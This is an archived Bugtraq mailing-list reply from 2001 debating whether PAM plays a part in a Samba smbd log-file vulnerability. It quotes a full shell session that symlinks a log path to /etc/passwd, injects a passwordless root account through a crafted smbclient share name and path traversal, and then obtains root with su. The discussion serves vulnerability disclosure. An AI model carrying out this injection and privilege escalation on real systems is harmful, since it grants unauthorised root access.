Bugtraq mailing list archives
Re: smbd remote file creation vulnerability
From: Joachim Blaabjerg <styx () mailbox as>
Date: Tue, 26 Jun 2001 11:08:04 +0200
Pavol Luptak <wilder () hq alert sk> wrote:
[wilder@lysurus wilder]$ cat /etc/redhat-release Linux Mandrake release 8.0 (Traktopel) for i586 [wilder@lysurus wilder]$ rpm -q pam pam-0.74-6mdk [wilder@lysurus wilder]$ egrep "log file" /etc/smb.conf # this tells Samba to use a separate log file for each machine log file = /var/log/samba/%m.log (= changed from default log.%m) # Put a capping on the size of the log files (in Kb). [wilder@lysurus wilder]$ rpm -qf /usr/sbin/smbd samba-2.0.9-1.3mdk [wilder@lysurus wilder]$ ln -s /etc/passwd /tmp/x.log [wilder@lysurus wilder]$ smbclient //localhost/"`perl -e '{print
"\ntoor::0:0::/:/bin/sh\n"}'`" -n ../../../tmp/x -N
added interface ip=10.0.0.43 bcast=10.0.0.255 nmask=255.255.255.0 Anonymous login successful Domain=[UI42] OS=[Unix] Server=[Samba 2.0.9] [wilder@lysurus wilder]$ tail /etc/passwd .. .. [2001/06/25 18:46:48, 1] smbd/reply.c:reply_sesssetup_and_X(927) Rejecting user 'wilder': authentication failed [2001/06/25 18:46:48, 0] smbd/service.c:make_connection(213) ../../../tmp/x (127.0.0.1) couldn't find service toor::0:0::/:/bin/sh [wilder@lysurus wilder]$ su toor [root@lysurus wilder]# Appending to /etc/passwd has nothing to do with pam.
No, not directly, but if your `su` uses PAM to authenticate users and PAM reacts to the spaces in the beginning of the passwd file, it surely has something to do with PAM. To check whether `su` uses PAM or not, try "ldd `which su`|grep libpam" <snip> Regards -- Joachim Blaabjerg styx () mailbox as www.SuxOS.org
Current thread:
- Re: smbd remote file creation vulnerability, (continued)
- Re: smbd remote file creation vulnerability Jarno Huuskonen (Jun 26)
- Re: smbd remote file creation vulnerability Pavol Luptak (Jun 26)
- Re: smbd remote file creation vulnerability Simple Nomad (Jun 27)
- Re: smbd remote file creation vulnerability Olaf Kirch (Jun 28)
- Re: smbd remote file creation vulnerability Simple Nomad (Jun 28)
- Re: smbd remote file creation vulnerability Tomek Lipski (Jun 26)
- Re: smbd remote file creation vulnerability Wichert Akkerman (Jun 27)
- Re: smbd remote file creation vulnerability Michal Zalewski (Jun 28)
- Re: smbd remote file creation vulnerability Steve Beattie (Jun 28)
- Re: smbd remote file creation vulnerability Phil Stracchino (Jun 28)
- Re: smbd remote file creation vulnerability Joachim Blaabjerg (Jun 27)
- Re: smbd remote file creation vulnerability Michal Zalewski (Jun 28)
- Re: smbd remote file creation vulnerability sarnold (Jun 28)
- Re: smbd remote file creation vulnerability Joseph Nicholas Yarbrough (Jun 26)